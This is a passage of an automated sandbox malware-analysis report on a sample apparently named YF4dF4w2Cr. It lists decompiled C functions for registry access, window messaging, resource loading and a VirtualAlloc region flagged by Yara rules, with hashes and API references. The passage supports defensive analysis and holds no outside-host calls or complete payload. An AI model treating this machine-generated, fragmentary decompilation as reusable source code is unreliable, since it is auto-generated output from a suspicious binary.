					_t25 = E0041EC3D();
					_t47 = _t25 - 1;
					if(_t25 == 1) {
						_push(_t42 + 0xc);
						_push("Software\\Classes\\");
						_push(_t42 + 8);
						_t28 = E004168AB(__ebx, __edi, __esi, _t47);
						 *(_t42 - 4) = 1;
						E004056C2(__ebx, _t42 + 0xc, _t28);
						E004010B0( *(_t42 + 8) + 0xfffffff0, _t38);
						 *(_t42 + 8) = 0x80000001;
					}
				}
				_t21 = RegSetValueA( *(_t42 + 8),  *(_t42 + 0xc),  *(_t42 + 0x10),  *(_t42 + 0x14),  *(_t42 + 0x18)); // executed
				E004010B0( &(( *(_t42 + 0xc))[0xfffffffffffffff0]), _t38);
				return E00431B73(_t21);
			}








                  0x004200a3
                  0x004200a3
                  0x004200a3
                  0x004200aa
                  0x004200af
                  0x004200b5
                  0x004200ba
                  0x004200c5
                  0x004200c7
                  0x004200cc
                  0x004200cf
                  0x004200d4
                  0x004200d8
                  0x004200dd
                  0x004200de
                  0x004200ea
                  0x004200ee
                  0x004200f9
                  0x004200fe
                  0x004200fe
                  0x004200cf
                  0x00420114
                  0x00420122
                  0x0042012e

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004200AA
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegSetValueA.ADVAPI32(80000000,?,00000000,?,?), ref: 00420114
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Value
                  • String ID: Software\Classes\
                  • API String ID: 2677715340-1121929649
                  • Opcode ID: ab11ff7b6dd85ca76f8ef7d4a2dcb46c4aa119be024d553879f94372adda49c0
                  • Instruction ID: 36d8d2347135d1014e61bc86d482cac2e80b6f69d22420b9f2c8f0bbc59bcd91
                  • Opcode Fuzzy Hash: ab11ff7b6dd85ca76f8ef7d4a2dcb46c4aa119be024d553879f94372adda49c0
                  • Instruction Fuzzy Hash: 7301713550010CABCF01EF61C851BDE3B65EF04368F10C11AFD295A2A2DB7ADAA4CBD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00420018, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E00420018(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t20;
				void* _t24;
				void* _t27;
				void* _t41;
				void* _t44;

				_t44 = __eflags;
				_t37 = __edx;
				_push(0);
				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
				_push( *(_t41 + 0xc));
				E00406039(__ebx, _t41 + 0xc, __edx, __edi, __esi, _t44);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				if( *(_t41 + 8) == 0x80000000) {
					_t24 = E0041EC3D();
					_t46 = _t24 - 1;
					if(_t24 == 1) {
						_push(_t41 + 0xc);
						_push("Software\\Classes\\");
						_push(_t41 + 8);
						_t27 = E004168AB(__ebx, __edi, __esi, _t46);
						 *(_t41 - 4) = 1;
						E004056C2(__ebx, _t41 + 0xc, _t27);
						E004010B0( *(_t41 + 8) + 0xfffffff0, _t37);
						 *(_t41 + 8) = 0x80000001;
					}
				}
				_t20 = RegQueryValueA( *(_t41 + 8),  *(_t41 + 0xc),  *(_t41 + 0x10),  *(_t41 + 0x14)); // executed
				E004010B0( &(( *(_t41 + 0xc))[0xfffffffffffffff0]), _t37);
				return E00431B73(_t20);
			}








                  0x00420018
                  0x00420018
                  0x00420018
                  0x0042001f
                  0x00420024
                  0x0042002a
                  0x0042002f
                  0x0042003a
                  0x0042003c
                  0x00420041
                  0x00420044
                  0x00420049
                  0x0042004d
                  0x00420052
                  0x00420053
                  0x0042005f
                  0x00420063
                  0x0042006e
                  0x00420073
                  0x00420073
                  0x00420044
                  0x00420086
                  0x00420094
                  0x004200a0

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042001F
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegQueryValueA.ADVAPI32(?,?,?,?), ref: 00420086
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$QueryValue
                  • String ID: Software\Classes\
                  • API String ID: 3057600494-1121929649
                  • Opcode ID: 606f051547e3e45d2aaf1ea27d24ff6cb1e51406f715982b84829b8d1ec6d3ef
                  • Instruction ID: 6bbe67646f65ca86f3e8ed88bc76af1affd6d011764a7e200061fff5045a4722
                  • Opcode Fuzzy Hash: 606f051547e3e45d2aaf1ea27d24ff6cb1e51406f715982b84829b8d1ec6d3ef
                  • Instruction Fuzzy Hash: 15018F31500108ABCF11EF61CC51BDE3B24EF00368F10C51AFD295A2A2DB7ACA94CB9A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041FF90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E0041FF90(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t23;
				void* _t26;
				void* _t40;
				void* _t43;

				_t43 = __eflags;
				_t36 = __edx;
				_push(0);
				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
				_push( *(_t40 + 0xc));
				E00406039(__ebx, _t40 + 0xc, __edx, __edi, __esi, _t43);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				if( *(_t40 + 8) == 0x80000000) {
					_t23 = E0041EC3D();
					_t45 = _t23 - 1;
					if(_t23 == 1) {
						_push(_t40 + 0xc);
						_push("Software\\Classes\\");
						_push(_t40 + 8);
						_t26 = E004168AB(__ebx, __edi, __esi, _t45);
						 *(_t40 - 4) = 1;
						E004056C2(__ebx, _t40 + 0xc, _t26);
						E004010B0( *(_t40 + 8) + 0xfffffff0, _t36);
						 *(_t40 + 8) = 0x80000001;
					}
				}
				_t19 = RegCreateKeyA( *(_t40 + 8),  *(_t40 + 0xc),  *(_t40 + 0x10)); // executed
				E004010B0( &(( *(_t40 + 0xc))[0xfffffffffffffff0]), _t36);
				return E00431B73(_t19);
			}








                  0x0041ff90
                  0x0041ff90
                  0x0041ff90
                  0x0041ff97
                  0x0041ff9c
                  0x0041ffa2
                  0x0041ffa7
                  0x0041ffb2
                  0x0041ffb4
                  0x0041ffb9
                  0x0041ffbc
                  0x0041ffc1
                  0x0041ffc5
                  0x0041ffca
                  0x0041ffcb
                  0x0041ffd7
                  0x0041ffdb
                  0x0041ffe6
                  0x0041ffeb
                  0x0041ffeb
                  0x0041ffbc
                  0x0041fffb
                  0x00420009
                  0x00420015

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041FF97
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegCreateKeyA.ADVAPI32(80000000,?,00000000), ref: 0041FFFB
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Create
                  • String ID: Software\Classes\
                  • API String ID: 1257125548-1121929649
                  • Opcode ID: f64bdd3912328e0541e1767b5fd0a8945742743fea4c45dcb99d5a30ac551f09
                  • Instruction ID: ad4cc70f86dcb154f4fc015380cce98aa4d1ccfaf3cac0b944be5d41c75bc983
                  • Opcode Fuzzy Hash: f64bdd3912328e0541e1767b5fd0a8945742743fea4c45dcb99d5a30ac551f09
                  • Instruction Fuzzy Hash: F0016236400108ABCF11EF65C851BDE3B24EF10368F10C52FFD295A2A2DB79DA95CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,022F0005), ref: 022F00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,022F0005), ref: 022F0113
                  Memory Dump Source
                  • Source File: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: 895abc098ca0bcaf11b762a7dbd5cd21e7295f8514ba7fbe2c37cc5ccf11011f
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: DDE1AF71A183068FDB64CF99C84072AF3E1BF84318F08453DEA959B64AE774EA45CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404F72, Relevance: 4.6, APIs: 3, Instructions: 127windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00404F72(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16, struct HWND__* _a20, char _a24) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				intOrPtr _v84;
				char _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t70;
				long _t91;
				signed int _t92;
				void* _t104;
				void* _t105;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;

				_t109 = __ecx;
				_t120 = _a20;
				_t119 = __ecx;
				if(_t120 != 0) {
					L4:
					 *((intOrPtr*)( *_t120 + 0x150))(1);
					_v44 = _v44 & 0x00000000;
					_v48 = _a4;
					_v52 = _a8;
					_v56 = _a12;
					_t70 = _a16;
					_t111 =  *_t70;
					_t118 =  *((intOrPtr*)(_t70 + 4));
					_v60 = _t111;
					_v64 = _t118;
					_v68 =  *((intOrPtr*)(_t70 + 8)) - _t111;
					_v72 =  *((intOrPtr*)(_t70 + 0xc)) - _t118;
					_v80 = _v80 & 0x00000000;
					_v76 =  *((intOrPtr*)(_t120 + 0x20));
					_v84 =  *((intOrPtr*)(E0041F363( *((intOrPtr*)(_t70 + 8)) - _t111, _t119, _t120, _t123) + 8));
					_v88 = _a24;
					_push( &_v88);
					if( *((intOrPtr*)( *_t119 + 0x64))() != 0) {
						_v40 = _v48;
						_v36 = _v52;
						_v32 = _v84;
						_v28 = _v60;
						_v24 = _v64;
						_v20 = _v68;
						_v16 = _v72;
						_v12 = _v56 & 0xeeffffff;
						_v8 = _v88;
						E00410F0D(__eflags, _t119);
						_t91 = SendMessageA( *(_t120 + 0xe8), 0x220, 0,  &_v40); // executed
						_a20 = _t91;
						_t92 = E0040EEF5(__eflags);
						__eflags = _t92;
						if(_t92 == 0) {
							 *((intOrPtr*)( *_t119 + 0x11c))();
						}
						__eflags = _a20;
						if(_a20 == 0) {
							L6:
							return 0;
						} else {
							__eflags = _v56 & 0x10000000;
							if((_v56 & 0x10000000) != 0) {
								BringWindowToTop(_a20);
								__eflags = _v56 & 0x20000000;
								if((_v56 & 0x20000000) == 0) {
									__eflags = _v56 & 0x01000000;
									if((_v56 & 0x01000000) == 0) {
										_push(1);
									} else {
										_push(3);
									}
								} else {
									_push(2);
								}
								E00412C34(_t119);
								E004049F6(_t120, _t119);
								SendMessageA( *(_t120 + 0xe8), 0x234, 0, 0);
							}
							__eflags = 1;
							return 1;
						}
					}
					 *((intOrPtr*)( *_t119 + 0x11c))();
					goto L6;
				}
				_t104 = E00415AD9();
				_t122 = _t104;
				if(_t104 != 0) {
					L3:
					_t120 =  *((intOrPtr*)(_t104 + 0x20));
					_t123 = _t120;
					if(_t120 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				_t104 = E00406436(_t105, _t109, _t119, _t120, _t122);
				goto L3;
			}





































                  0x00404f72
                  0x00404f7c
                  0x00404f80
                  0x00404f84
                  0x00404f9b
                  0x00404fa1
                  0x00404faa
                  0x00404fae
                  0x00404fb4
                  0x00404fba
                  0x00404fbd
                  0x00404fc0
                  0x00404fc2
                  0x00404fcf
                  0x00404fd2
                  0x00404fd5
                  0x00404fd8
                  0x00404fde
                  0x00404fe2
                  0x00404fed
                  0x00404ff6
                  0x00404ffb
                  0x00405003
                  0x00405019
                  0x0040501f
                  0x00405025
                  0x0040502b
                  0x00405031
                  0x00405037
                  0x0040503d
                  0x00405048
                  0x0040504f
                  0x00405052
                  0x0040506e
                  0x00405070
                  0x00405073
                  0x00405078
                  0x0040507a
                  0x00405080
                  0x00405080
                  0x00405086
                  0x0040508a
                  0x0040500f
                  0x00000000
                  0x0040508c
                  0x0040508c
                  0x00405093
                  0x00405098
                  0x0040509e
                  0x004050a5
                  0x004050ab
                  0x004050b2
                  0x004050b8
                  0x004050b4
                  0x004050b4
                  0x004050b4
                  0x004050a7
                  0x004050a7
                  0x004050a7
                  0x004050bc
                  0x004050c4
                  0x004050d8
                  0x004050d8
                  0x004050dc
                  0x00000000
                  0x004050dc
                  0x0040508a
                  0x00405009
                  0x00000000
                  0x00405009
                  0x00404f86
                  0x00404f8b
                  0x00404f8d
                  0x00404f94
                  0x00404f94
                  0x00404f97
                  0x00404f99
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404f99
                  0x00404f8f
                  0x00404f8f
                  0x00000000

                  APIs
                  • SendMessageA.USER32(?,00000220,00000000,?), ref: 0040506E
                  • BringWindowToTop.USER32 ref: 00405098
                  • SendMessageA.USER32(?,00000234,00000000,00000000), ref: 004050D8
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$BringException@8H_prolog3ThrowWindow
                  • String ID:
                  • API String ID: 306136782-0
                  • Opcode ID: 452149fc19147f145c348fe4a77579aa4786186d4c22d5f577727ab54a72b289
                  • Instruction ID: 6dae8c16407d9ac781d226e3f0a0722bfa2389bcaa109963fa7a45136cf591de
                  • Opcode Fuzzy Hash: 452149fc19147f145c348fe4a77579aa4786186d4c22d5f577727ab54a72b289
                  • Instruction Fuzzy Hash: 4251E474A012099FDB10DFA9C985BAEBBF5FF48304F10402AF909EB390D778A9418F95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402500, Relevance: 4.6, APIs: 3, Instructions: 87COMMON
                  Download Yara Rule
                  C-Code - Quality: 32%
                  			E00402500(char** __ecx, struct HINSTANCE__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t28;
				char _t35;
				char _t38;
				char _t41;
				char* _t45;
				char** _t49;
				char* _t50;
				char* _t53;
				signed int _t54;
				signed short* _t67;
				void* _t69;
				int _t72;
				intOrPtr _t73;
				short* _t75;
				intOrPtr _t77;
				void* _t78;
				void* _t79;

				_t71 = _a8;
				_t65 = _a4;
				_t49 = __ecx;
				if(FindResourceA(_a4, (_a8 >> 0x00000004) + 0x00000001 & 0x0000ffff, 6) == 0) {
					L2:
					return 0;
				} else {
					_t67 = E004019E0(_t65, _t24, _t71);
					_t79 = _t78 + 0xc;
					if(_t67 != 0) {
						_t3 =  &(_t67[1]); // 0x2
						_t75 = _t3;
						_t28 = WideCharToMultiByte(3, 0, _t75,  *_t67 & 0x0000ffff, 0, 0, 0, 0); // executed
						_t72 = _t28;
						if((0x00000001 -  *((intOrPtr*)( *_t49 - 0x10 + 0xc)) |  *((intOrPtr*)( *_t49 - 0x10 + 8)) - _t72) < 0) {
							_push(_t72);
							E00401470(_t49, _t49, _t67);
						}
						_t53 =  *_t49;
						_t60 =  *_t67 & 0x0000ffff;
						WideCharToMultiByte(3, 0, _t75,  *_t67 & 0x0000ffff, _t53, _t72, 0, 0);
						_pop(_t76);
						if(_t72 < 0) {
							L8:
							E00401090(_t53, _t60, 0x80070057);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t49);
							_push(_t72);
							_t73 = _v8;
							_t50 = _t53;
							if(_t73 != 0) {
								_t54 = _v12;
								if(_t54 == 0) {
									L12:
									E00401090(_t54, _t60, 0x80070057);
								}
								_t35 =  *_t50;
								_t77 =  *((intOrPtr*)(_t35 - 0xc));
								_push(_t67);
								_t69 = _t54 - _t35;
								_t60 = 0x00000001 -  *((intOrPtr*)(_t35 - 4)) |  *((intOrPtr*)(_t35 - 8)) - _t73;
								if(1 < 0) {
									_push(_t73);
									E00401470(_t50, _t50, _t69);
									_t54 = _v16;
								}
								_t38 =  *_t50;
								_push(_t73);
								if(_t69 > _t77) {
									_push(_t54);
									_t54 =  *(_t38 - 8);
									_push(_t54);
									_push(_t38);
									E0043065F(_t50, _t54);
								} else {
									_t60 =  *(_t38 - 8);
									_t54 = _t38 + _t69;
									_push(_t54);
									_push( *(_t38 - 8));
									_push(_t38);
									E00430B25(_t50);
								}
								_t79 = _t79 + 0x10;
								_pop(_t67);
								_pop(_t76);
								if(_t73 < 0) {
									goto L12;
								}
								_t41 =  *_t50;
								if(_t73 >  *((intOrPtr*)(_t41 - 8))) {
									goto L12;
								}
								 *((intOrPtr*)(_t41 - 0xc)) = _t73;
								 *((char*)(_t73 +  *_t50)) = 0;
								return _t41;
							} else {
								return E00401E30(_t53);
							}
						} else {
							_t45 =  *_t49;
							if(_t72 >  *((intOrPtr*)(_t45 - 8))) {
								goto L8;
							} else {
								 *(_t45 - 0xc) = _t72;
								( *_t49)[_t72] = 0;
								return 1;
							}
						}
					} else {
						goto L2;
					}
				}
			}


























                  0x00402502
                  0x0040250c
                  0x00402511
                  0x00402522
                  0x00402535
                  0x0040253a
                  0x00402524
                  0x0040252c
                  0x0040252e
                  0x00402533
                  0x0040254a
                  0x0040254a
                  0x00402552
                  0x00402558
                  0x0040256e
                  0x00402570
                  0x00402573
                  0x00402573
                  0x00402578
                  0x0040257a
                  0x00402589
                  0x0040258f
                  0x00402592
                  0x004025af
                  0x004025b4
                  0x004025b9
                  0x004025ba
                  0x004025bb
                  0x004025bc
                  0x004025bd
                  0x004025be
                  0x004025bf
                  0x004025c0
                  0x004025c1
                  0x004025c2
                  0x004025c6
                  0x004025ca
                  0x004025d6
                  0x004025dc
                  0x004025de
                  0x004025e3
                  0x004025e3
                  0x004025e8
                  0x004025eb
                  0x004025ee
                  0x004025f1
                  0x00402600
                  0x00402602
                  0x00402604
                  0x00402607
                  0x0040260c
                  0x0040260c
                  0x00402610
                  0x00402612
                  0x00402615
                  0x00402627
                  0x00402628
                  0x0040262b
                  0x0040262c
                  0x0040262d
                  0x00402617
                  0x00402617
                  0x0040261a
                  0x0040261d
                  0x0040261e
                  0x0040261f
                  0x00402620
                  0x00402620
                  0x00402632
                  0x00402635
                  0x00402636
                  0x00402639
                  0x00000000
                  0x00000000
                  0x0040263b
                  0x00402640
                  0x00000000
                  0x00000000
                  0x00402642
                  0x00402647
                  0x0040264d
                  0x004025cc
                  0x004025d3
                  0x004025d3
                  0x00402594
                  0x00402594
                  0x00402599
                  0x00000000
                  0x0040259b
                  0x0040259b
                  0x004025a1
                  0x004025ac
                  0x004025ac
                  0x00402599
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402533

                  APIs
                  • FindResourceA.KERNEL32(?,?,00000006), ref: 0040251A
                    • Part of subcall function 004019E0: LoadResource.KERNEL32(?,?,?,?,0040252C,?,00000000,?,?,00402740,00000000,?,?,?,?,0040AD0B), ref: 004019EC
                  • WideCharToMultiByte.KERNELBASE(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 00402552
                  • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000), ref: 00402589
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharMultiResourceWide$FindLoad
                  • String ID:
                  • API String ID: 861045882-0
                  • Opcode ID: 7863595d9ff105e0f61620a44138432fde7c611104670e4d42e31e0e37da1537
                  • Instruction ID: ab90c26927212f4ee8fca040aa4f0871524c501861b284741b334b9420958e70
                  • Opcode Fuzzy Hash: 7863595d9ff105e0f61620a44138432fde7c611104670e4d42e31e0e37da1537
                  • Instruction Fuzzy Hash: 4221A5323412107FE3219B5ADC89F6777ACEB85750F11416AF540EB2D4D6B8AC5187A8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414B9C, Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00414B9C(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t29;
				char* _t30;
				intOrPtr _t32;
				char** _t34;
				signed int _t39;
				char** _t43;
				char* _t45;

				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t34 = 0x462ba0;
				_t45 =  *0x462ba0; // 0x451b18
				if(_t45 == 0) {
					L14:
					return 1;
				}
				do {
					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
					if(_t29 != 0) {
						goto L12;
					}
					_t8 =  &(_t34[1]); // 0x462bc0
					_t43 =  *_t8;
					while(1) {
						_t30 =  *_t43;
						if(_t30 == 0) {
							break;
						}
						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t14 =  &(_t43[1]); // 0x1
							_t39 =  *_t14;
							_t32 = _v20;
							if(_v12 == 0) {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
							} else {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t43 =  &(_t43[2]);
					}
					RegCloseKey(_v8);
					_v8 = 0;
					L12:
					_t34 =  &(_t34[2]);
				} while ( *_t34 != 0);
				goto L14;
			}















                  0x00414ba8
                  0x00414bae
                  0x00414bb1
                  0x00414bb4
                  0x00414bb7
                  0x00414bbe
                  0x00414bc1
                  0x00414bc6
                  0x00414bcc
                  0x00414c5a
                  0x00414c60
                  0x00414c60
                  0x00414bd3
                  0x00414be1
                  0x00414be9
                  0x00000000
                  0x00000000
                  0x00414beb
                  0x00414beb
                  0x00414c3c
                  0x00414c3c
                  0x00414c40
                  0x00000000
                  0x00000000
                  0x00414c09
                  0x00414c11
                  0x00414c11
                  0x00414c14
                  0x00414c1a
                  0x00414c26
                  0x00414c1c
                  0x00414c1c
                  0x00414c1c
                  0x00414c1a
                  0x00414c2c
                  0x00414c2f
                  0x00414c36
                  0x00414c39
                  0x00414c39
                  0x00414c45
                  0x00414c4b
                  0x00414c4e
                  0x00414c4e
                  0x00414c51
                  0x00000000

                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,00462BA0,00000000,00000001,?), ref: 00414BE1
                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00414C01
                  • RegCloseKey.ADVAPI32(?), ref: 00414C45
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  • Opcode ID: dda4bb9c493b882952acdf434a85abb3409c9764fd7b0edcfaa04450280da8d2
                  • Instruction ID: 0d605141b2b3a1f8deb0ee767be3a254aedc986605f7b564ed76e2b6a05936f2
                  • Opcode Fuzzy Hash: dda4bb9c493b882952acdf434a85abb3409c9764fd7b0edcfaa04450280da8d2
                  • Instruction Fuzzy Hash: 8A2149B1D01208EFDB14CF86D944AEEFBF8FF91701F2144AAE415A6210E3B59A40CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426574, Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00426574(void* __ecx, int _a4, CHAR* _a8, int _a12) {
				char _v8;
				int _v12;
				int _t14;
				long _t19;
				void* _t27;

				_push(__ecx);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					_t14 = GetPrivateProfileIntA(_a4, _a8, _a12,  *(__ecx + 0x68)); // executed
				} else {
					_t27 = E0042652C(__ecx, _a4);
					if(_t27 != 0) {
						_a4 = 4;
						_t19 = RegQueryValueExA(_t27, _a8, 0,  &_v12,  &_v8,  &_a4);
						RegCloseKey(_t27);
						if(_t19 != 0) {
							goto L2;
						} else {
							_t14 = _v8;
						}
					} else {
						L2:
						_t14 = _a12;
					}
				}
				return _t14;
			}








                  0x00426579
                  0x0042657a
                  0x00426580
                  0x004265d4
                  0x00426582
                  0x0042658a
                  0x0042658e
                  0x004265a7
                  0x004265af
                  0x004265b8
                  0x004265c1
                  0x00000000
                  0x004265c3
                  0x004265c3
                  0x004265c3
                  0x00426590
                  0x00426590
                  0x00426590
                  0x00426590
                  0x0042658e
                  0x004265dc

                  APIs
                  • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004265AF
                  • RegCloseKey.ADVAPI32(00000000), ref: 004265B8
                  • GetPrivateProfileIntA.KERNEL32 ref: 004265D4
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileQueryValue
                  • String ID:
                  • API String ID: 1423431592-0
